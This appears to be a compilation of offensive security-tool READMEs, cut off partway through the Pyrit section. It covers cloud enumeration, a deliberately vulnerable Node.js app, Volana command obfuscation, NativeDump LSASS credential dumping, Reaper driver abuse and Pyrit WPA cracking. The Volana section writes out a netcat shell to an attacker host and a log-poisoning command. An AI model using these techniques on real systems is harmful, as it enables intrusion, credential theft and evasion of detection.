      How to use Ashok?

      A detailed usage guide is available in the Usage section of the Wiki.

      An index of the main options is given below:

      Docker

      Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

      $ docker pull powerexploit/ashok-v1.2
      $ docker container run -it powerexploit/ashok-v1.2 --help


        Credits



        CloudBrute - Awesome Cloud Enumerator

        By: Unknown


        A tool to find a company's (target's) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

        The complete write-up is available here.


        Motivation

        We are always thinking about what we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted in the cloud, and possibly apps behind proxy servers.
        Here is the list of issues with previous approaches that we tried to fix:

        • separated wordlists
        • lack of proper concurrency
        • lack of supporting all major cloud providers
        • require authentication or keys or cloud CLI access
        • outdated endpoints and regions
        • Incorrect file storage detection
        • lack support for proxies (useful for bypassing region restrictions)
        • lack support for user agent randomization (useful for bypassing rare restrictions)
        • hard to use, poorly configured

        Features

        • Cloud detection (IPINFO API and Source Code)
        • Supports all major providers
        • Black-Box (unauthenticated)
        • Fast (concurrent)
        • Modular and easily customizable
        • Cross Platform (windows, linux, mac)
        • User-Agent Randomization
        • Proxy Randomization (HTTP, Socks5)

        Supported Cloud Providers

        Microsoft: - Storage - Apps

        Amazon: - Storage - Apps

        Google: - Storage - Apps

        DigitalOcean: - storage

        Vultr: - Storage

        Linode: - Storage

        Alibaba: - Storage

        Version

        1.0.0

        Usage

        Just download the latest release for your operating system and follow the usage.

        To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

        It looks like this

        providers: ["amazon","alibaba","microsoft","digitalocean","linode","vultr","google"] # supported providers
        environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
        proxytype: "http" # socks5 / http
        ipinfo: "" # IPINFO.io API KEY

        For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URL mutations, such as test-keyword.target.region and test.keyword.target.region.
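The mutation idea can be sketched in Python. This is only an illustration of how the environments combine with the keyword, not CloudBrute's actual Go implementation:

```python
def mutate(keyword, environments):
    """Combine each environment with the keyword, the way the config's
    'environments' list is used to generate candidate names."""
    out = []
    for env in environments:
        out.append(f"{env}-{keyword}")   # e.g. test-target
        out.append(f"{env}.{keyword}")   # e.g. test.target
        out.append(f"{keyword}-{env}")   # e.g. target-test
    out.append(keyword)                  # the bare keyword itself
    return out

candidates = mutate("target", ["test", "dev", "prod"])
print(candidates[:4])
```

Each candidate name is then tried against every configured provider's endpoint and region.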

        Some wordlists are provided out of the box, but it's better to customize and minimize your wordlists (based on your recon) before running the tool.

        After setting up your API key, you are ready to use CloudBrute.

         β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
        β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•
        β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
        β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•
        β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
        β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•β•β•β•β•
        V 1.0.7
        usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
        -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
        <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
        [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
        [-m|--mode "<value>"] [-o|--output "<value>"]
        [-C|--configFolder "<value>"]

        Awesome Cloud Enumerator

        Arguments:

        -h --help Print help information
        -d --domain domain
        -k --keyword keyword used to generate urls
        -w --wordlist path to wordlist
        -c --cloud force a search, check config.yaml providers list
        -t --threads number of threads. Default: 80
        -T --timeout timeout per request in seconds. Default: 10
        -p --proxy use proxy list
        -a --randomagent user agent randomization
        -D --debug show debug logs. Default: false
        -q --quite suppress all output. Default: false
        -m --mode storage or app. Default: storage
        -o --output Output file. Default: out.txt
        -C --configFolder Config path. Default: config


        for example

        CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

        Please note: the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, use it for both the domain (-d) and keyword (-k) arguments.

        If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.

        CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w "./data/storage_small.txt" -c amazon -o target_output.txt

        Dev

        • Clone the repo
        • go build -o CloudBrute main.go
        • go test internal

        in action

        How to contribute

        • Add a module or fix something and then pull request.
        • Share it with whomever you believe can use it.
        • Do the extra work and share your findings with the community β™₯

        FAQ

        How to make the best out of this tool?

        Read the usage.

        I get errors; what should I do?

        Make sure you read the usage correctly, and if you think you found a bug open an issue.

        When I use proxies, I get too many errors, or it's too slow?

        That's because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify good proxies with your chosen provider.

        Too fast or too slow?

        Change the -T (timeout) option to get the best results for your run.

        Credits

        Inspired by every single repo listed here.



        VulnNodeApp - A Vulnerable Node.Js Application

        By: Unknown


        A vulnerable application built with Node.js, the Express server, and the EJS template engine. This application is meant for educational purposes only.


        Setup

        Clone this repository

        git clone https://github.com/4auvar/VulnNodeApp.git

        Application setup:

        • Install the latest node.js version with npm.
        • Open terminal/command prompt and navigate to the location of downloaded/cloned repository.
        • Run command: npm install

        DB setup

        • Install and configure the latest MySQL version and start the MySQL service/daemon
        • Log in to MySQL as the root user and run the SQL script below:
        CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
        create database vuln_node_app_db;
        GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
        USE vuln_node_app_db;
        create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
        insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
        insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
        insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
        insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
        insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

        Set basic environment variable

        • Set the environment variables below:
          • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
          • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
          • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
          • DATABASE_PASS (E.g: password or password you change in above DB script)

        Start the server

        • Open the command prompt/terminal and navigate to the location of your repository
        • Run command: npm start
        • Access the application at http://localhost:3000

        Vulnerability covered

        • SQL Injection
        • Cross Site Scripting (XSS)
        • Insecure Direct Object Reference (IDOR)
        • Command Injection
        • Arbitrary File Retrieval
        • Regular Expression Injection
        • External XML Entity Injection (XXE)
        • Node js Deserialization
        • Security Misconfiguration
        • Insecure Session Management

        TODO

        • Will add new vulnerabilities such as CORS, Template Injection, etc...
        • Improve application documentation

        Issues

        • In case of bugs in the application, feel free to create an issue on GitHub.

        Contribution

        • Feel free to create a pull request for any contribution.

        You can reach me out at @4auvar



        Volana - Shell Command Obfuscation To Avoid Detection Systems

        By: Unknown


        Shell command obfuscation to avoid SIEM/detection system

        During a pentest, an important aspect is stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making after-the-fact cleaning useless on its own.

        volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage.


        Usage

        You need to get an interactive shell (find a way to spawn it; you are a hacker, it's your job!). Then download volana on the target machine and launch it. That's it: now you can type the commands you want executed stealthily.

        ## Download it from github release
        ## If you do not have internet access from compromised machine, find another way
        curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

        ## Execute it
        ./volana

        ## You are now under the radar
        volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
        volana Β» [command]

        Keywords for the volana console:

        • ring: enable ring mode, i.e. each command is launched alongside plenty of others to cover tracks (against solutions that monitor system calls)
        • exit: exit the volana console

        from non interactive shell

        Imagine you have a non-interactive shell (webshell or blind RCE): you can use the encrypt and decrypt subcommands. First, you need to build volana with an embedded encryption key.

        On attacker machine

        ## Build volana with encryption key
        make build.volana-with-encryption

        ## Transfer it on TARGET (the unique detectable command)
        ## [...]

        ## Encrypt the command you want to stealthy execute
        ## (Here a nc bindshell to obtain a interactive shell)
        volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
        >>> ENCRYPTED COMMAND

        Copy the encrypted command and execute it with your RCE on the target machine:

        ./volana decr [encrypted_command]
        ## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

        Why not just hide the command with echo [command] | base64 and decode on the target with echo [encoded_command] | base64 -d | bash?

        Because we want to be protected against systems that trigger an alert on base64 use, or that scan for base64 text in commands. We also want to make investigation difficult, and base64 isn't a real obstacle.
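The difference can be illustrated in Python (volana itself is written in Go; the toy XOR below merely stands in for its embedded-key encryption, and the command and key are hypothetical):

```python
import base64

cmd = "nc [attacker_ip] 4444 -e /bin/bash"   # hypothetical command

# base64 is encoding, not encryption: anyone who captures it can reverse it
encoded = base64.b64encode(cmd.encode()).decode()
assert base64.b64decode(encoded).decode() == cmd

# a keyed transform (toy XOR here) is opaque to an observer without the key
def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = b"embedded-build-key"   # hypothetical key baked in at build time
ciphertext = xor(cmd.encode(), key)
recovered = xor(ciphertext, key).decode()
print(recovered)
```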

        Detection

        Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

        By "detected" we mean that an alert can be triggered when a certain command has been executed.

        Hide from

        Only the command line that launches volana will be caught. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it.

        • Detection systems that are based on history command output
        • Detection systems that are based on history files
        • .bash_history, ".zsh_history" etc ..
        • Detection systems that are based on bash debug traps
        • Detection systems that are based on sudo built-in logging system
        • Detection systems tracing all processes syscall system-wide (eg opensnoop)
        • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
        • Easy to detect & avoid: pkill -9 script
        • Not a common case
        • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
        • Command detection could be avoided with volana with encryption

        Visible for

        • Detection systems that have alert for unknown command (volana one)
        • Detection systems that are based on keylogger
        • Easy to avoid: copy/past commands
        • Not a common case
        • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
        • Only for sudo or su commands
        • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
        • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
        • Difficult to analyze, and could be made unreadable by making several diversion syscalls
        • Custom LD_PRELOAD injection to make log
        • Not a common case at all

        Bug bounty

        Sorry for the clickbait title, but no money will be provided for contributors. πŸ›

        Let me know if you have found:

        • a way to detect volana
        • a way to spy on a console that doesn't detect volana commands
        • a way to avoid a detection system

        Report here

        Credit



        NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

        By: Unknown


        NativeDump allows dumping the LSASS process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List streams).


        • NtOpenProcessToken and NtAdjustPrivilegesToken to get the "SeDebugPrivilege" privilege
        • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
        • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
        • NtOpenProcess to get a handle for the lsass process
        • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

        Usage:

        NativeDump.exe [DUMP_FILE]

        The default file name is "proc_.dmp":

        The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

        Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

        The project has three branches at the moment (apart from the main branch with the basic technique):

        • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

        • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

        • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


        Technique in detail: Creating a minimal Minidump file

        After reading about the undocumented Minidump structures, the file format can be summed up as:

        • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
        • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
        • Streams: Every stream contains different information related to the process and has its own format
        • Regions: The actual bytes from the process from each memory region which can be read

        I created a parsing tool which can be helpful: MinidumpParser.

        We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


        A. Header

        The header is a 32-byte structure which can be defined in C# as:

        public struct MinidumpHeader
        {
        public uint Signature;
        public ushort Version;
        public ushort ImplementationVersion;
        public ushort NumberOfStreams;
        public uint StreamDirectoryRva;
        public uint CheckSum;
        public IntPtr TimeDateStamp;
        }

        The required values are: - Signature: Fixed value 0x504d444d (the "MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three streams required for the file - StreamDirectoryRva: Fixed value 0x20 (32 bytes), the size of the header
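Packing this header can be sketched in Python using the standard on-disk MINIDUMP_HEADER layout (the C# struct above splits Version into two ushorts, which packs to the same bytes):

```python
import struct

MDMP_SIGNATURE = 0x504D444D   # "MDMP" packed little-endian
MINIDUMP_VERSION = 0xA793     # Microsoft constant, low word of the Version field

def build_header(number_of_streams=3, stream_dir_rva=0x20):
    """Pack the 32-byte Minidump header; fields the parsers do not need
    (checksum, timestamp, flags) are left at zero."""
    return struct.pack(
        "<IIIIIIQ",
        MDMP_SIGNATURE,     # Signature
        MINIDUMP_VERSION,   # Version
        number_of_streams,  # NumberOfStreams
        stream_dir_rva,     # StreamDirectoryRva (0x20 = header size)
        0,                  # CheckSum
        0,                  # TimeDateStamp
        0,                  # Flags
    )

header = build_header()
print(len(header), header[:4])
```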


        B. Stream Directory

        Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the size is 36 bytes. The C# struct definition for an entry is:

        public struct MinidumpStreamDirectoryEntry
        {
        public uint StreamType;
        public uint Size;
        public uint Location;
        }

        The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

        ID Stream Type
        0x00 UnusedStream
        0x01 ReservedStream0
        0x02 ReservedStream1
        0x03 ThreadListStream
        0x04 ModuleListStream
        0x05 MemoryListStream
        0x06 ExceptionStream
        0x07 SystemInfoStream
        0x08 ThreadExListStream
        0x09 Memory64ListStream
        0x0A CommentStreamA
        0x0B CommentStreamW
        0x0C HandleDataStream
        0x0D FunctionTableStream
        0x0E UnloadedModuleListStream
        0x0F MiscInfoStream
        0x10 MemoryInfoListStream
        0x11 ThreadInfoListStream
        0x12 HandleOperationListStream
        0x13 TokenStream
        0x16 ProcessVmCountersStream
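Packing the three directory entries can be sketched in Python. The sizes and offsets are the ones used in the following sections; the Memory64List size shown is just a placeholder, since in a real file it grows with the number of regions:

```python
import struct

def build_directory(entries):
    """Pack the Stream Directory: one 12-byte (StreamType, Size, Location)
    entry per stream, in file order."""
    return b"".join(struct.pack("<III", stype, size, loc)
                    for stype, size, loc in entries)

directory = build_directory([
    (7, 56, 0x44),   # SystemInfoStream: 56 bytes at offset 68
    (4, 112, 0x7C),  # ModuleListStream: 112 bytes at offset 124
    (9, 16, 0x12A),  # Memory64ListStream at offset 298 (placeholder size)
])
print(len(directory))
```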

        C. SystemInformation Stream

        The first stream is a SystemInformation stream, with ID 7. The size is 56 bytes and it will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

        public struct SystemInformationStream
        {
        public ushort ProcessorArchitecture;
        public ushort ProcessorLevel;
        public ushort ProcessorRevision;
        public byte NumberOfProcessors;
        public byte ProductType;
        public uint MajorVersion;
        public uint MinorVersion;
        public uint BuildNumber;
        public uint PlatformId;
        public uint UnknownField1;
        public uint UnknownField2;
        public IntPtr ProcessorFeatures;
        public IntPtr ProcessorFeatures2;
        public uint UnknownField3;
        public ushort UnknownField14;
        public byte UnknownField15;
        }

        The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


        D. ModuleList Stream

        The second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInformation stream, and it also has a fixed size of 112 bytes, since it contains the entry for a single module, the only one needed for the parse to be correct: "lsasrv.dll".

        The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

        public struct ModuleListStream
        {
        public uint NumberOfModules;
        public ModuleInfo[] Modules;
        }

        As there is only one, it gets simplified to:

        public struct ModuleListStream
        {
        public uint NumberOfModules;
        public IntPtr BaseAddress;
        public uint Size;
        public uint UnknownField1;
        public uint Timestamp;
        public uint PointerName;
        public IntPtr UnknownField2;
        public IntPtr UnknownField3;
        public IntPtr UnknownField4;
        public IntPtr UnknownField5;
        public IntPtr UnknownField6;
        public IntPtr UnknownField7;
        public IntPtr UnknownField8;
        public IntPtr UnknownField9;
        public IntPtr UnknownField10;
        public IntPtr UnknownField11;
        }

        The required values are: - NumberOfModules: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained by adding all memory region sizes from BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of another library - PointerName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


        E. Memory64List Stream

        The third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.

        public struct Memory64ListStream
        {
        public ulong NumberOfEntries;
        public uint MemoryRegionsBaseAddress;
        public Memory64Info[] MemoryInfoEntries;
        }

        Each memory region entry is a 16-byte structure:

        public struct Memory64Info
        {
        public IntPtr Address;
        public IntPtr Size;
        }

        The required values are: - NumberOfEntries: Number of memory regions, obtained after looping the memory regions - MemoryRegionsBaseAddress: Location of the start of the memory regions' bytes, calculated by adding the size of all 16-byte memory entries - Address and Size: Obtained for each valid region while looping them
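A sketch of packing this stream in Python; note that the on-disk format stores the regions' base RVA as 8 bytes, and the region addresses below are hypothetical:

```python
import struct

def build_memory64_list(regions, base_rva):
    """Pack the Memory64List stream: NumberOfEntries, the RVA where the raw
    region bytes begin (8 bytes on disk), then one (address, size) pair
    per region."""
    stream = struct.pack("<QQ", len(regions), base_rva)
    for address, size in regions:
        stream += struct.pack("<QQ", address, size)
    return stream

# two hypothetical committed memory regions
regions = [(0x7FF600000000, 0x1000), (0x7FF600001000, 0x2000)]
# raw bytes start right after the stream itself: 16-byte header + 16 bytes/region
stream = build_memory64_list(regions, base_rva=0x12A + 16 + len(regions) * 16)
print(len(stream))
```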


        F. Looping memory regions

        There are prerequisites to looping the memory regions of the lsass.exe process, which can be satisfied using only NTAPIs:

        1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivileges, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
        2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
        3. Open a process handle. Use ntdll!NtOpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

        With this it is possible to traverse the process memory by calling:

        • ntdll!NtQueryVirtualMemory: Returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
        • If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning the region is accessible and committed, its base address and size populate one entry of the Memory64List stream and its bytes can be added to the file
        • If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
        • ntdll!NtReadVirtualMemory: Adds the bytes of that region to the Minidump file after the Memory64List stream
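        The region filter described above boils down to a simple predicate (constants are from the Windows SDK; the function name is ours):

```python
PAGE_NOACCESS = 0x01  # region cannot be read
MEM_COMMIT = 0x1000   # region is committed (backed by physical storage)

def is_dumpable(protect: int, state: int) -> bool:
    """A region's bytes are written to the dump only when the region
    is committed and not marked PAGE_NOACCESS."""
    return state == MEM_COMMIT and protect != PAGE_NOACCESS
```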


        G. Creating Minidump file

        After the previous steps we have all that is necessary to create the Minidump file. We can create the file locally or send the bytes to a remote machine, optionally encoding or encrypting them first. Some of these possibilities are implemented in the delegates branch, where the locally created file can be XOR-encoded, and in the remote branch, where the file can be XOR-encoded before being sent to a remote machine.




        ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

        By: Zion3R


        ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


        Features

        • Identifies potential ROP gadgets in binary executables.
        • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
        • Generates exploit templates to speed up exploit development
        • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
        • Can print function names and addresses for further analysis.
        • Supports searching for specific instruction patterns.

        Usage

        • <binary>: Path to the binary file for analysis.
        • -s, --search SEARCH: Optional. Search for specific instruction patterns.
        • -f, --functions: Optional. Print function names and addresses.

        Examples

        • Analyze a binary without searching for specific instructions:

        python3 ropdump.py /path/to/binary

        • Analyze a binary and search for specific instructions:

        python3 ropdump.py /path/to/binary -s "pop eax"

        • Analyze a binary and print function names and addresses:

        python3 ropdump.py /path/to/binary -f
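        The gadget-identification idea can be sketched in a few lines: scan the executable bytes for a ret (0xC3) and report the short byte sequences ending at it. This is a simplified illustration of the technique, not ROPDump's actual implementation:

```python
def find_gadget_offsets(code: bytes, max_len: int = 4) -> list[tuple[int, bytes]]:
    """Return (offset, bytes) pairs for byte sequences of up to
    max_len bytes that end in a ret (0xC3) instruction."""
    gadgets = []
    for i, b in enumerate(code):
        if b == 0xC3:  # ret opcode
            start = max(0, i - max_len + 1)
            gadgets.append((start, code[start:i + 1]))
    return gadgets

# b"\x58\xc3" is "pop eax; ret" on x86
sample = b"\x90\x58\xc3\x90"
gadgets = find_gadget_offsets(sample)
```

A real tool additionally disassembles the candidate bytes to confirm they form valid instructions, since x86 decoding depends on where you start reading.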



        Reaper - Proof Of Concept On BYOVD Attack

        By: Zion3R


        Reaper is a proof-of-concept designed to demonstrate a BYOVD (Bring Your Own Vulnerable Driver) attack. This malicious technique involves loading a legitimate but vulnerable driver onto a target system, which attackers can then exploit to perform malicious actions.

        Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

        Note: Reaper does not kill the Windows Defender process, since that process is protected; Reaper is a simple proof of concept.


        Features

        • Kill process
        • Suspend process

        Help

            ____
           / __ \___  ____ _____  ___  _____
          / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
         / _, _/  __/ /_/ / /_/ /  __/ /
        /_/ |_|\___/\__,_/ .___/\___/_/
                        /_/

        [Coded by MrEmpy]
        [v1.0]

        Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
        Options:
        sp, suspend process
        kp, kill process

        Values:
        PROCESSID process id to suspend/kill

        Examples:
        Reaper.exe sp 1337
        Reaper.exe kp 1337

        Demonstration

        Install

        You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

        Note: The executable and driver must be in the same directory.



        Pyrit - The Famous WPA Precomputed Cracker

        By: Zion3R


        Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication data in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

        WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate subsequent traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase, ultimately allowing the password that protects the network to be revealed. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


        The author does not encourage or support using Pyrit for the infringement of people's communication privacy. The exploration and realization of the technology discussed here are motivated as a purpose of their own; this is documented by the open development, strictly source-code-based distribution and 'copyleft' licensing.

        Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operating systems and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

        Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
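        The PMK derivation itself is standard PBKDF2-HMAC-SHA1: the passphrase is the key material, the SSID is the salt, and the result is a 256-bit key after 4096 iterations:

```python
import hashlib

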